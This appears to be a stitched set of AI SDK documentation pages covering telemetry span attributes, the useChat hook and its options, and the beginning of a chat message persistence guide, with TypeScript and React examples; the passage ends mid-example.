For Next.js applications, please follow the Next.js OpenTelemetry guide to enable telemetry first.
You can then use the experimental_telemetry option to enable telemetry on specific function calls while the feature is experimental:
const result = await generateText({
model: openai('gpt-4-turbo'),
prompt: 'Write a short story about a cat.',
experimental_telemetry: { isEnabled: true },
});
When telemetry is enabled, you can also control if you want to record the input values and the output values for the function.
By default, both are enabled. You can disable them by setting the recordInputs and recordOutputs options to false.
Disabling the recording of inputs and outputs can be useful for privacy, data transfer, and performance reasons. You might for example want to disable recording inputs if they contain sensitive information.
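For example:
const result = await generateText({
model: openai('gpt-4-turbo'),
prompt: 'Write a short story about a cat.',
experimental_telemetry: {
isEnabled: true,
recordInputs: false, // do not record the prompt
recordOutputs: false, // do not record the generated text
},
});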
Telemetry Metadata
You can provide a functionId to identify the function that the telemetry data is for,
and metadata to include additional information in the telemetry data.
const result = await generateText({
model: openai('gpt-4-turbo'),
prompt: 'Write a short story about a cat.',
experimental_telemetry: {
isEnabled: true,
functionId: 'my-awesome-function',
metadata: {
something: 'custom',
someOtherThing: 'other-value',
},
},
});
Custom Tracer
You may provide a tracer which must return an OpenTelemetry Tracer. This is useful in situations where
you want your traces to use a TracerProvider other than the one provided by the @opentelemetry/api singleton.
import { NodeTracerProvider } from '@opentelemetry/sdk-trace-node';
const tracerProvider = new NodeTracerProvider();
const result = await generateText({
model: openai('gpt-4-turbo'),
prompt: 'Write a short story about a cat.',
experimental_telemetry: {
isEnabled: true,
tracer: tracerProvider.getTracer('ai'),
},
});
Collected Data
generateText function
generateText records 3 types of spans:
- `ai.generateText` (span): the full length of the generateText call. It contains 1 or more `ai.generateText.doGenerate` spans. It contains the basic LLM span information and the following attributes:
  - `operation.name`: `ai.generateText` and the functionId that was set through `telemetry.functionId`
  - `ai.operationId`: `"ai.generateText"`
  - `ai.prompt`: the prompt that was used when calling `generateText`
  - `ai.response.text`: the text that was generated
  - `ai.response.toolCalls`: the tool calls that were made as part of the generation (stringified JSON)
  - `ai.response.finishReason`: the reason why the generation finished
  - `ai.settings.maxSteps`: the maximum number of steps that were set
- `ai.generateText.doGenerate` (span): a provider doGenerate call. It can contain `ai.toolCall` spans. It contains the call LLM span information and the following attributes:
  - `operation.name`: `ai.generateText.doGenerate` and the functionId that was set through `telemetry.functionId`
  - `ai.operationId`: `"ai.generateText.doGenerate"`
  - `ai.prompt.format`: the format of the prompt
  - `ai.prompt.messages`: the messages that were passed into the provider
  - `ai.prompt.tools`: array of stringified tool definitions. The tools can be of type `function` or `provider-defined`. Function tools have a `name`, `description` (optional), and `parameters` (JSON schema). Provider-defined tools have a `name`, `id`, and `args` (Record).
  - `ai.prompt.toolChoice`: the stringified tool choice setting (JSON). It has a `type` property (`auto`, `none`, `required`, `tool`), and if the type is `tool`, a `toolName` property with the specific tool.
  - `ai.response.text`: the text that was generated
  - `ai.response.toolCalls`: the tool calls that were made as part of the generation (stringified JSON)
  - `ai.response.finishReason`: the reason why the generation finished
- `ai.toolCall` (span): a tool call that is made as part of the generateText call. See Tool call spans for more details.
streamText function
streamText records 3 types of spans and 2 types of events:
- `ai.streamText` (span): the full length of the streamText call. It contains an `ai.streamText.doStream` span. It contains the basic LLM span information and the following attributes:
  - `operation.name`: `ai.streamText` and the functionId that was set through `telemetry.functionId`
  - `ai.operationId`: `"ai.streamText"`
  - `ai.prompt`: the prompt that was used when calling `streamText`
  - `ai.response.text`: the text that was generated
  - `ai.response.toolCalls`: the tool calls that were made as part of the generation (stringified JSON)
  - `ai.response.finishReason`: the reason why the generation finished
  - `ai.settings.maxSteps`: the maximum number of steps that were set
- `ai.streamText.doStream` (span): a provider doStream call. This span contains an `ai.stream.firstChunk` event and `ai.toolCall` spans. It contains the call LLM span information and the following attributes:
  - `operation.name`: `ai.streamText.doStream` and the functionId that was set through `telemetry.functionId`
  - `ai.operationId`: `"ai.streamText.doStream"`
  - `ai.prompt.format`: the format of the prompt
  - `ai.prompt.messages`: the messages that were passed into the provider
  - `ai.prompt.tools`: array of stringified tool definitions. The tools can be of type `function` or `provider-defined`. Function tools have a `name`, `description` (optional), and `parameters` (JSON schema). Provider-defined tools have a `name`, `id`, and `args` (Record).
  - `ai.prompt.toolChoice`: the stringified tool choice setting (JSON). It has a `type` property (`auto`, `none`, `required`, `tool`), and if the type is `tool`, a `toolName` property with the specific tool.
  - `ai.response.text`: the text that was generated
  - `ai.response.toolCalls`: the tool calls that were made as part of the generation (stringified JSON)
  - `ai.response.msToFirstChunk`: the time it took to receive the first chunk in milliseconds
  - `ai.response.msToFinish`: the time it took to receive the finish part of the LLM stream in milliseconds
  - `ai.response.avgCompletionTokensPerSecond`: the average number of completion tokens per second
  - `ai.response.finishReason`: the reason why the generation finished
- `ai.toolCall` (span): a tool call that is made as part of the streamText call. See Tool call spans for more details.
- `ai.stream.firstChunk` (event): an event that is emitted when the first chunk of the stream is received.
  - `ai.response.msToFirstChunk`: the time it took to receive the first chunk
- `ai.stream.finish` (event): an event that is emitted when the finish part of the LLM stream is received.
generateObject function
generateObject records 2 types of spans:
- `ai.generateObject` (span): the full length of the generateObject call. It contains 1 or more `ai.generateObject.doGenerate` spans. It contains the basic LLM span information and the following attributes:
  - `operation.name`: `ai.generateObject` and the functionId that was set through `telemetry.functionId`
  - `ai.operationId`: `"ai.generateObject"`
  - `ai.prompt`: the prompt that was used when calling `generateObject`
  - `ai.schema`: stringified JSON schema version of the schema that was passed into the `generateObject` function
  - `ai.schema.name`: the name of the schema that was passed into the `generateObject` function
  - `ai.schema.description`: the description of the schema that was passed into the `generateObject` function
  - `ai.response.object`: the object that was generated (stringified JSON)
  - `ai.settings.mode`: the object generation mode, e.g. `json`
  - `ai.settings.output`: the output type that was used, e.g. `object` or `no-schema`
- `ai.generateObject.doGenerate` (span): a provider doGenerate call. It contains the call LLM span information and the following attributes:
  - `operation.name`: `ai.generateObject.doGenerate` and the functionId that was set through `telemetry.functionId`
  - `ai.operationId`: `"ai.generateObject.doGenerate"`
  - `ai.prompt.format`: the format of the prompt
  - `ai.prompt.messages`: the messages that were passed into the provider
  - `ai.response.object`: the object that was generated (stringified JSON)
  - `ai.settings.mode`: the object generation mode
  - `ai.response.finishReason`: the reason why the generation finished
streamObject function
streamObject records 2 types of spans and 1 type of event:
- `ai.streamObject` (span): the full length of the streamObject call. It contains 1 or more `ai.streamObject.doStream` spans. It contains the basic LLM span information and the following attributes:
  - `operation.name`: `ai.streamObject` and the functionId that was set through `telemetry.functionId`
  - `ai.operationId`: `"ai.streamObject"`
  - `ai.prompt`: the prompt that was used when calling `streamObject`
  - `ai.schema`: stringified JSON schema version of the schema that was passed into the `streamObject` function
  - `ai.schema.name`: the name of the schema that was passed into the `streamObject` function
  - `ai.schema.description`: the description of the schema that was passed into the `streamObject` function
  - `ai.response.object`: the object that was generated (stringified JSON)
  - `ai.settings.mode`: the object generation mode, e.g. `json`
  - `ai.settings.output`: the output type that was used, e.g. `object` or `no-schema`
- `ai.streamObject.doStream` (span): a provider doStream call. This span contains an `ai.stream.firstChunk` event. It contains the call LLM span information and the following attributes:
  - `operation.name`: `ai.streamObject.doStream` and the functionId that was set through `telemetry.functionId`
  - `ai.operationId`: `"ai.streamObject.doStream"`
  - `ai.prompt.format`: the format of the prompt
  - `ai.prompt.messages`: the messages that were passed into the provider
  - `ai.settings.mode`: the object generation mode
  - `ai.response.object`: the object that was generated (stringified JSON)
  - `ai.response.msToFirstChunk`: the time it took to receive the first chunk
  - `ai.response.finishReason`: the reason why the generation finished
- `ai.stream.firstChunk` (event): an event that is emitted when the first chunk of the stream is received.
  - `ai.response.msToFirstChunk`: the time it took to receive the first chunk
embed function
embed records 2 types of spans:
- `ai.embed` (span): the full length of the embed call. It contains 1 `ai.embed.doEmbed` span. It contains the basic embedding span information and the following attributes:
  - `operation.name`: `ai.embed` and the functionId that was set through `telemetry.functionId`
  - `ai.operationId`: `"ai.embed"`
  - `ai.value`: the value that was passed into the `embed` function
  - `ai.embedding`: a JSON-stringified embedding
- `ai.embed.doEmbed` (span): a provider doEmbed call. It contains the basic embedding span information and the following attributes:
  - `operation.name`: `ai.embed.doEmbed` and the functionId that was set through `telemetry.functionId`
  - `ai.operationId`: `"ai.embed.doEmbed"`
  - `ai.values`: the values that were passed into the provider (array)
  - `ai.embeddings`: an array of JSON-stringified embeddings
embedMany function
embedMany records 2 types of spans:
- `ai.embedMany` (span): the full length of the embedMany call. It contains 1 or more `ai.embedMany.doEmbed` spans. It contains the basic embedding span information and the following attributes:
  - `operation.name`: `ai.embedMany` and the functionId that was set through `telemetry.functionId`
  - `ai.operationId`: `"ai.embedMany"`
  - `ai.values`: the values that were passed into the `embedMany` function
  - `ai.embeddings`: an array of JSON-stringified embeddings
- `ai.embedMany.doEmbed` (span): a provider doEmbed call. It contains the basic embedding span information and the following attributes:
  - `operation.name`: `ai.embedMany.doEmbed` and the functionId that was set through `telemetry.functionId`
  - `ai.operationId`: `"ai.embedMany.doEmbed"`
  - `ai.values`: the values that were sent to the provider
  - `ai.embeddings`: an array of JSON-stringified embeddings for each value
Span Details
Basic LLM span information
Many spans that use LLMs (ai.generateText, ai.generateText.doGenerate, ai.streamText, ai.streamText.doStream,
ai.generateObject, ai.generateObject.doGenerate, ai.streamObject, ai.streamObject.doStream) contain the following attributes:
- `resource.name`: the functionId that was set through `telemetry.functionId`
- `ai.model.id`: the id of the model
- `ai.model.provider`: the provider of the model
- `ai.request.headers.*`: the request headers that were passed in through `headers`
- `ai.response.providerMetadata`: provider specific metadata returned with the generation response
- `ai.settings.maxRetries`: the maximum number of retries that were set
- `ai.telemetry.functionId`: the functionId that was set through `telemetry.functionId`
- `ai.telemetry.metadata.*`: the metadata that was passed in through `telemetry.metadata`
- `ai.usage.completionTokens`: the number of completion tokens that were used
- `ai.usage.promptTokens`: the number of prompt tokens that were used
Call LLM span information
Spans that correspond to individual LLM calls (ai.generateText.doGenerate, ai.streamText.doStream, ai.generateObject.doGenerate, ai.streamObject.doStream) contain
basic LLM span information and the following attributes:
- `ai.response.model`: the model that was used to generate the response. This can be different from the model that was requested if the provider supports aliases.
- `ai.response.id`: the id of the response. Uses the ID from the provider when available.
- `ai.response.timestamp`: the timestamp of the response. Uses the timestamp from the provider when available.
- Semantic Conventions for GenAI operations:
  - `gen_ai.system`: the provider that was used
  - `gen_ai.request.model`: the model that was requested
  - `gen_ai.request.temperature`: the temperature that was set
  - `gen_ai.request.max_tokens`: the maximum number of tokens that were set
  - `gen_ai.request.frequency_penalty`: the frequency penalty that was set
  - `gen_ai.request.presence_penalty`: the presence penalty that was set
  - `gen_ai.request.top_k`: the topK parameter value that was set
  - `gen_ai.request.top_p`: the topP parameter value that was set
  - `gen_ai.request.stop_sequences`: the stop sequences
  - `gen_ai.response.finish_reasons`: the finish reasons that were returned by the provider
  - `gen_ai.response.model`: the model that was used to generate the response. This can be different from the model that was requested if the provider supports aliases.
  - `gen_ai.response.id`: the id of the response. Uses the ID from the provider when available.
  - `gen_ai.usage.input_tokens`: the number of prompt tokens that were used
  - `gen_ai.usage.output_tokens`: the number of completion tokens that were used
Basic embedding span information
Many spans that use embedding models (ai.embed, ai.embed.doEmbed, ai.embedMany, ai.embedMany.doEmbed) contain the following attributes:
- `ai.model.id`: the id of the model
- `ai.model.provider`: the provider of the model
- `ai.request.headers.*`: the request headers that were passed in through `headers`
- `ai.response.providerMetadata`: provider specific metadata returned with the generation response
- `ai.settings.maxRetries`: the maximum number of retries that were set
- `ai.telemetry.functionId`: the functionId that was set through `telemetry.functionId`
- `ai.telemetry.metadata.*`: the metadata that was passed in through `telemetry.metadata`
- `ai.usage.tokens`: the number of tokens that were used
- `resource.name`: the functionId that was set through `telemetry.functionId`
Tool call spans
Tool call spans (ai.toolCall) contain the following attributes:
- `operation.name`: `"ai.toolCall"`
- `ai.operationId`: `"ai.toolCall"`
- `ai.toolCall.name`: the name of the tool
- `ai.toolCall.id`: the id of the tool call
- `ai.toolCall.args`: the parameters of the tool call
- `ai.toolCall.result`: the result of the tool call. Only available if the tool call is successful and the result is serializable.
title: Overview description: An overview of AI SDK UI.
AI SDK UI
AI SDK UI is designed to help you build interactive chat, completion, and assistant applications with ease. It is a framework-agnostic toolkit, streamlining the integration of advanced AI functionalities into your applications.
AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently. With four main hooks — useChat, useCompletion, useObject, and useAssistant — you can incorporate real-time chat capabilities, text completions, streamed JSON, and interactive assistant features into your app.
- `useChat` offers real-time streaming of chat messages, abstracting state management for inputs, messages, loading, and errors, allowing for seamless integration into any UI design.
- `useCompletion` enables you to handle text completions in your applications, managing the prompt input and automatically updating the UI as new completions are streamed.
- `useObject` is a hook that allows you to consume streamed JSON objects, providing a simple way to handle and display structured data in your application.
- `useAssistant` is designed to facilitate interaction with OpenAI-compatible assistant APIs, managing UI state and updating it automatically as responses are streamed.
These hooks are designed to reduce the complexity and time required to implement AI interactions, letting you focus on creating exceptional user experiences.
UI Framework Support
AI SDK UI supports the following frameworks: React, Svelte, Vue.js, and SolidJS (deprecated). Here is a comparison of the supported functions across these frameworks:
| Function | React | Svelte | Vue.js | SolidJS (deprecated) |
|---|---|---|---|---|
| useChat | ✓ | ✓ (Chat) | ✓ | ✓ |
| useCompletion | ✓ | ✓ (Completion) | ✓ | ✓ |
| useObject | ✓ | ✓ (StructuredObject) | ✗ | ✓ |
| useAssistant | ✓ | ✗ | ✓ | ✗ |
API Reference
Please check out the AI SDK UI API Reference for more details on each function.
title: Chatbot description: Learn how to use the useChat hook.
Chatbot
The useChat hook makes it effortless to create a conversational user interface for your chatbot application. It enables the streaming of chat messages from your AI provider, manages the chat state, and updates the UI automatically as new messages arrive.
To summarize, the useChat hook provides the following features:
- Message Streaming: All the messages from the AI provider are streamed to the chat UI in real-time.
- Managed States: The hook manages the states for input, messages, status, error and more for you.
- Seamless Integration: Easily integrate your chat AI into any design or layout with minimal effort.
In this guide, you will learn how to use the useChat hook to create a chatbot application with real-time message streaming.
Check out our chatbot with tools guide to learn how to use tools in your chatbot.
Let's start with the following example first.
Example
'use client';
import { useChat } from '@ai-sdk/react';
export default function Page() {
const { messages, input, handleInputChange, handleSubmit } = useChat({});
return (
<>
{messages.map(message => (
<div key={message.id}>
{message.role === 'user' ? 'User: ' : 'AI: '}
{message.content}
</div>
))}
<form onSubmit={handleSubmit}>
<input name="prompt" value={input} onChange={handleInputChange} />
<button type="submit">Submit</button>
</form>
</>
);
}
import { openai } from '@ai-sdk/openai';
import { streamText } from 'ai';
// Allow streaming responses up to 30 seconds
export const maxDuration = 30;
export async function POST(req: Request) {
const { messages } = await req.json();
const result = streamText({
model: openai('gpt-4-turbo'),
system: 'You are a helpful assistant.',
messages,
});
return result.toDataStreamResponse();
}
In the Page component, the useChat hook will send a request to your AI provider endpoint whenever the user submits a message.
The messages are then streamed back in real-time and displayed in the chat UI.
This enables a seamless chat experience where the user can see the AI response as soon as it is available, without having to wait for the entire response to be received.
Customized UI
useChat also provides ways to manage the chat message and input states via code, show status, and update messages without being triggered by user interactions.
Status
The useChat hook returns a status. It has the following possible values:
- `submitted`: The message has been sent to the API and we're awaiting the start of the response stream.
- `streaming`: The response is actively streaming in from the API, receiving chunks of data.
- `ready`: The full response has been received and processed; a new user message can be submitted.
- `error`: An error occurred during the API request, preventing successful completion.
You can use status for e.g. the following purposes:
- To show a loading spinner while the chatbot is processing the user's message.
- To show a "Stop" button to abort the current message.
- To disable the submit button.
'use client';
import { useChat } from '@ai-sdk/react';
export default function Page() {
const { messages, input, handleInputChange, handleSubmit, status, stop } =
useChat({});
return (
<>
{messages.map(message => (
<div key={message.id}>
{message.role === 'user' ? 'User: ' : 'AI: '}
{message.content}
</div>
))}
{(status === 'submitted' || status === 'streaming') && (
<div>
{status === 'submitted' && <Spinner />}
<button type="button" onClick={() => stop()}>
Stop
</button>
</div>
)}
<form onSubmit={handleSubmit}>
<input
name="prompt"
value={input}
onChange={handleInputChange}
disabled={status !== 'ready'}
/>
<button type="submit">Submit</button>
</form>
</>
);
}
Error State
Similarly, the error state reflects the error object thrown during the fetch request.
It can be used to display an error message, disable the submit button, or show a retry button:
'use client';
import { useChat } from '@ai-sdk/react';
export default function Chat() {
const { messages, input, handleInputChange, handleSubmit, error, reload } =
useChat({});
return (
<div>
{messages.map(m => (
<div key={m.id}>
{m.role}: {m.content}
</div>
))}
{error && (
<>
<div>An error occurred.</div>
<button type="button" onClick={() => reload()}>
Retry
</button>
</>
)}
<form onSubmit={handleSubmit}>
<input
value={input}
onChange={handleInputChange}
disabled={error != null}
/>
</form>
</div>
);
}
Please also see the error handling guide for more information.
Modify messages
Sometimes, you may want to directly modify some existing messages. For example, a delete button can be added to each message to allow users to remove them from the chat history.
The setMessages function can help you achieve these tasks:
const { messages, setMessages, ... } = useChat()
const handleDelete = (id) => {
setMessages(messages.filter(message => message.id !== id))
}
return <>
{messages.map(message => (
<div key={message.id}>
{message.role === 'user' ? 'User: ' : 'AI: '}
{message.content}
<button onClick={() => handleDelete(message.id)}>Delete</button>
</div>
))}
...
You can think of messages and setMessages as a pair of state and setState in React.
Controlled input
In the initial example, we have handleSubmit and handleInputChange callbacks that manage the input changes and form submissions. These are handy for common use cases, but you can also use uncontrolled APIs for more advanced scenarios such as form validation or customized components.
The following example demonstrates how to use more granular APIs like setInput and append with your custom input and submit button components:
const { input, setInput, append } = useChat()
return <>
<MyCustomInput value={input} onChange={value => setInput(value)} />
<MySubmitButton onClick={() => {
// Send a new message to the AI provider
append({
role: 'user',
content: input,
})
}}/>
...
Cancellation and regeneration
It's also a common use case to abort the response message while it's still streaming back from the AI provider. You can do this by calling the stop function returned by the useChat hook.
const { stop, status, ... } = useChat()
return <>
<button onClick={stop} disabled={!(status === 'streaming' || status === 'submitted')}>Stop</button>
...
When the user clicks the "Stop" button, the fetch request will be aborted. This avoids consuming unnecessary resources and improves the UX of your chatbot application.
Similarly, you can also request the AI provider to reprocess the last message by calling the reload function returned by the useChat hook:
const { reload, status, ... } = useChat()
return <>
<button onClick={reload} disabled={!(status === 'ready' || status === 'error')}>Regenerate</button>
...
</>
When the user clicks the "Regenerate" button, the AI provider will regenerate the last message and replace the current one correspondingly.
Throttling UI Updates
This feature is currently only available for React.
By default, the useChat hook will trigger a render every time a new chunk is received.
You can throttle the UI updates with the experimental_throttle option.
const { messages, ... } = useChat({
// Throttle the messages and data updates to 50ms:
experimental_throttle: 50
})
Event Callbacks
useChat provides optional event callbacks that you can use to handle different stages of the chatbot lifecycle:
- `onFinish`: Called when the assistant message is completed.
- `onError`: Called when an error occurs during the fetch request.
- `onResponse`: Called when the response from the API is received.
These callbacks can be used to trigger additional actions, such as logging, analytics, or custom UI updates.
import { Message } from '@ai-sdk/react';
const {
/* ... */
} = useChat({
onFinish: (message, { usage, finishReason }) => {
console.log('Finished streaming message:', message);
console.log('Token usage:', usage);
console.log('Finish reason:', finishReason);
},
onError: error => {
console.error('An error occurred:', error);
},
onResponse: response => {
console.log('Received HTTP response from server:', response);
},
});
It's worth noting that you can abort the processing by throwing an error in the onResponse callback. This will trigger the onError callback and stop the message from being appended to the chat UI. This can be useful for handling unexpected responses from the AI provider.
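A sketch of this pattern:
const {
/* ... */
} = useChat({
onResponse: response => {
if (!response.ok) {
// throwing here stops the message from being appended
// to the chat UI and triggers the onError callback:
throw new Error(`Unexpected response: ${response.status}`);
}
},
});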
Request Configuration
Custom headers, body, and credentials
By default, the useChat hook sends an HTTP POST request to the /api/chat endpoint with the message list as the request body. You can customize the request by passing additional options to the useChat hook:
const { messages, input, handleInputChange, handleSubmit } = useChat({
api: '/api/custom-chat',
headers: {
Authorization: 'your_token',
},
body: {
user_id: '123',
},
credentials: 'same-origin',
});
In this example, the useChat hook sends a POST request to the /api/custom-chat endpoint with the specified headers, additional body fields, and credentials for that fetch request. On your server side, you can handle the request with this additional information.
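On the server, a matching route handler could look like this (a sketch based on the header and body fields shown above):
export async function POST(req: Request) {
// the extra body field configured on the useChat hook:
const { messages, user_id } = await req.json();
// the custom header configured on the useChat hook:
const authorization = req.headers.get('Authorization');
// ... validate and handle the request
}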
Setting custom body fields per request
You can configure custom body fields on a per-request basis using the body option of the handleSubmit function.
This is useful if you want to pass in additional information to your backend that is not part of the message list.
'use client';
import { useChat } from '@ai-sdk/react';
export default function Chat() {
const { messages, input, handleInputChange, handleSubmit } = useChat();
return (
<div>
{messages.map(m => (
<div key={m.id}>
{m.role}: {m.content}
</div>
))}
<form
onSubmit={event => {
handleSubmit(event, {
body: {
customKey: 'customValue',
},
});
}}
>
<input value={input} onChange={handleInputChange} />
</form>
</div>
);
}
You can retrieve these custom fields on your server side by destructuring the request body:
export async function POST(req: Request) {
// Extract additional information ("customKey") from the body of the request:
const { messages, customKey } = await req.json();
//...
}
Controlling the response stream
With streamText, you can control how error messages and usage information are sent back to the client.
Error Messages
By default, the error message is masked for security reasons.
The default error message is "An error occurred."
You can forward error messages or send your own error message by providing a getErrorMessage function:
import { openai } from '@ai-sdk/openai';
import { streamText } from 'ai';
export async function POST(req: Request) {
const { messages } = await req.json();
const result = streamText({
model: openai('gpt-4o'),
messages,
});
return result.toDataStreamResponse({
getErrorMessage: error => {
if (error == null) {
return 'unknown error';
}
if (typeof error === 'string') {
return error;
}
if (error instanceof Error) {
return error.message;
}
return JSON.stringify(error);
},
});
}
Usage Information
By default, the usage information is sent back to the client. You can disable it by setting the sendUsage option to false:
import { openai } from '@ai-sdk/openai';
import { streamText } from 'ai';
export async function POST(req: Request) {
const { messages } = await req.json();
const result = streamText({
model: openai('gpt-4o'),
messages,
});
return result.toDataStreamResponse({
sendUsage: false,
});
}
Text Streams
useChat can handle plain text streams by setting the streamProtocol option to text:
'use client';
import { useChat } from '@ai-sdk/react';
export default function Chat() {
const { messages } = useChat({
streamProtocol: 'text',
});
return <>...</>;
}
This configuration also works with other backend servers that stream plain text. Check out the stream protocol guide for more information.
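On the server, you can produce such a plain text stream with streamText and its toTextStreamResponse method. For example:
import { openai } from '@ai-sdk/openai';
import { streamText } from 'ai';
export async function POST(req: Request) {
const { messages } = await req.json();
const result = streamText({
model: openai('gpt-4o'),
messages,
});
// streams plain text, matching streamProtocol: 'text' on the client
return result.toTextStreamResponse();
}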
Empty Submissions
You can configure the useChat hook to allow empty submissions by setting the allowEmptySubmit option to true.
'use client';
import { useChat } from '@ai-sdk/react';
export default function Chat() {
const { messages, input, handleInputChange, handleSubmit } = useChat();
return (
<div>
{messages.map(m => (
<div key={m.id}>
{m.role}: {m.content}
</div>
))}
<form
onSubmit={event => {
handleSubmit(event, {
allowEmptySubmit: true,
});
}}
>
<input value={input} onChange={handleInputChange} />
</form>
</div>
);
}
Reasoning
Some models such as DeepSeek deepseek-reasoner
and Anthropic claude-3-7-sonnet-20250219 support reasoning tokens.
These tokens are typically sent before the message content.
You can forward them to the client with the sendReasoning option:
import { deepseek } from '@ai-sdk/deepseek';
import { streamText } from 'ai';
export async function POST(req: Request) {
const { messages } = await req.json();
const result = streamText({
model: deepseek('deepseek-reasoner'),
messages,
});
return result.toDataStreamResponse({
sendReasoning: true,
});
}
On the client side, you can access the reasoning parts of the message object.
They have a details property that contains the reasoning and redacted reasoning parts.
You can also use reasoning to access just the reasoning as a string.
messages.map(message => (
<div key={message.id}>
{message.role === 'user' ? 'User: ' : 'AI: '}
{message.parts.map((part, index) => {
// text parts:
if (part.type === 'text') {
return <div key={index}>{part.text}</div>;
}
// reasoning parts:
if (part.type === 'reasoning') {
return (
<pre key={index}>
{part.details.map(detail =>
detail.type === 'text' ? detail.text : '<redacted>',
)}
</pre>
);
}
})}
</div>
));
Sources
Some providers such as Perplexity and Google Generative AI include sources in the response.
Currently sources are limited to web pages that ground the response.
You can forward them to the client with the sendSources option:
import { perplexity } from '@ai-sdk/perplexity';
import { streamText } from 'ai';
export async function POST(req: Request) {
const { messages } = await req.json();
const result = streamText({
model: perplexity('sonar-pro'),
messages,
});
return result.toDataStreamResponse({
sendSources: true,
});
}
On the client side, you can access source parts of the message object. Here is an example that renders the sources as links at the bottom of the message:
messages.map(message => (
<div key={message.id}>
{message.role === 'user' ? 'User: ' : 'AI: '}
{message.parts
.filter(part => part.type !== 'source')
.map((part, index) => {
if (part.type === 'text') {
return <div key={index}>{part.text}</div>;
}
})}
{message.parts
.filter(part => part.type === 'source')
.map(part => (
<span key={`source-${part.source.id}`}>
[
<a href={part.source.url} target="_blank">
{part.source.title ?? new URL(part.source.url).hostname}
</a>
]
</span>
))}
</div>
));
Image Generation
Some models such as Google gemini-2.0-flash-exp support image generation.
When images are generated, they are exposed as files to the client.
On the client side, you can access file parts of the message object
and render them as images.
messages.map(message => (
<div key={message.id}>
{message.role === 'user' ? 'User: ' : 'AI: '}
{message.parts.map((part, index) => {
if (part.type === 'text') {
return <div key={index}>{part.text}</div>;
} else if (part.type === 'file' && part.mimeType.startsWith('image/')) {
return (
<img key={index} src={`data:${part.mimeType};base64,${part.data}`} />
);
}
})}
</div>
));
Attachments (Experimental)
The useChat hook supports sending attachments along with a message as well as rendering them on the client. This can be useful for building applications that involve sending images, files, or other media content to the AI provider.
There are two ways to send attachments with a message, either by providing a FileList object or a list of URLs to the handleSubmit function:
FileList
By using FileList, you can send multiple files as attachments along with a message using the file input element. The useChat hook will automatically convert them into data URLs and send them to the AI provider.
'use client';
import { useChat } from '@ai-sdk/react';
import { useRef, useState } from 'react';
export default function Page() {
const { messages, input, handleSubmit, handleInputChange, status } =
useChat();
const [files, setFiles] = useState<FileList | undefined>(undefined);
const fileInputRef = useRef<HTMLInputElement>(null);
return (
<div>
<div>
{messages.map(message => (
<div key={message.id}>
<div>{`${message.role}: `}</div>
<div>
{message.content}
<div>
{message.experimental_attachments
?.filter(attachment =>
attachment.contentType?.startsWith('image/'),
)
.map((attachment, index) => (
<img
key={`${message.id}-${index}`}
src={attachment.url}
alt={attachment.name}
/>
))}
</div>
</div>
</div>
))}
</div>
<form
onSubmit={event => {
handleSubmit(event, {
experimental_attachments: files,
});
setFiles(undefined);
if (fileInputRef.current) {
fileInputRef.current.value = '';
}
}}
>
<input
type="file"
onChange={event => {
if (event.target.files) {
setFiles(event.target.files);
}
}}
multiple
ref={fileInputRef}
/>
<input
value={input}
placeholder="Send message..."
onChange={handleInputChange}
disabled={status !== 'ready'}
/>
</form>
</div>
);
}
URLs
You can also send URLs as attachments along with a message. This can be useful for sending links to external resources or media content.
Note: The URL can also be a data URL, which is a base64-encoded string that represents the content of a file. Currently, only `image/*` content types get automatically converted into multi-modal content parts. You will need to handle other content types manually.
'use client';
import { useChat } from '@ai-sdk/react';
import { useState } from 'react';
import { Attachment } from '@ai-sdk/ui-utils';
export default function Page() {
const { messages, input, handleSubmit, handleInputChange, status } =
useChat();
const [attachments] = useState<Attachment[]>([
{
name: 'earth.png',
contentType: 'image/png',
url: 'https://example.com/earth.png',
},
{
name: 'moon.png',
contentType: 'image/png',
url: 'data:image/png;base64,iVBORw0KGgo...',
},
]);
return (
<div>
<div>
{messages.map(message => (
<div key={message.id}>
<div>{`${message.role}: `}</div>
<div>
{message.content}
<div>
{message.experimental_attachments
?.filter(attachment =>
attachment.contentType?.startsWith('image/'),
)
.map((attachment, index) => (
<img
key={`${message.id}-${index}`}
src={attachment.url}
alt={attachment.name}
/>
))}
</div>
</div>
</div>
))}
</div>
<form
onSubmit={event => {
handleSubmit(event, {
experimental_attachments: attachments,
});
}}
>
<input
value={input}
placeholder="Send message..."
onChange={handleInputChange}
disabled={status !== 'ready'}
/>
</form>
</div>
);
}
title: Chatbot Message Persistence description: Learn how to store and load chat messages in a chatbot.
Chatbot Message Persistence
Being able to store and load chat messages is crucial for most AI chatbots.
In this guide, we'll show how to implement message persistence with useChat and streamText.
Starting a new chat
When the user navigates to the chat page without providing a chat ID, we need to create a new chat and redirect to the chat page with the new chat ID.
import { redirect } from 'next/navigation';
import { createChat } from '@tools/chat-store';
export default async function Page() {
const id = await createChat(); // create a new chat
redirect(`/chat/${id}`); // redirect to chat page, see below
}
Our example chat store implementation uses files to store the chat messages. In a real-world application, you would use a database or a cloud storage service, and get the chat ID from the database. That being said, the function interfaces are designed to be easily replaced with other implementations.
import { generateId } from 'ai';
import { existsSync, mkdirSync } from 'fs';
import { writeFile } from 'fs/promises';
import path from 'path';
export async function createChat(): Promise<string> {
const id = generateId(); // generate a unique chat ID
await writeFile(getChatFile(id), '[]'); // create an empty chat file
return id;
}
function getChatFile(id: string): string {
const chatDir = path.join(process.cwd(), '.chats');
if (!existsSync(chatDir)) mkdirSync(chatDir, { recursive: true });
return path.join(chatDir, `${id}.json`);
}
Loading an existing chat
When the user navigates to the chat page with a chat ID, we need to load the chat messages and display them.
import { loadChat } from '@tools/chat-store';
import Chat from '@ui/chat';
export default async function Page(props: { params: Promise<{ id: string }> }) {
const { id } = await props.params; // get the chat ID from the URL
const messages = await loadChat(id); // load the chat messages
return <Chat id={id} initialMessages={messages} />; // display the chat
}
The loadChat function in our file-based chat store is implemented as follows:
import { Message } from 'ai';
import { readFile } from 'fs/promises';
export async function loadChat(id: string): Promise<Message[]> {
return JSON.parse(await readFile(getChatFile(id), 'utf8'));
}
// ... rest of the file
The display component is a simple chat component that uses the useChat hook to
send and receive messages:
'use client';
import { Message, useChat } from '@ai-sdk/react';
export default function Chat({
id,
initialMessages,
}: { id?: string | undefined; initialMessages?: Message[] } = {}) {
const { input, handleInputChange, handleSubmit, messages } = useChat({
id, // use the provided chat ID
initialMessages, // initial messages if provided
sendExtraMessageFields: true, // send id and createdAt for each message
});
// simplified rendering code, extend as needed:
return (
<div>
{messages.map(m => (
<div key={m.id}>
{m.role === 'user' ? 'User: ' : 'AI: '}
{m.content}
</div>
))}
<form onSubmit={handleSubmit}>
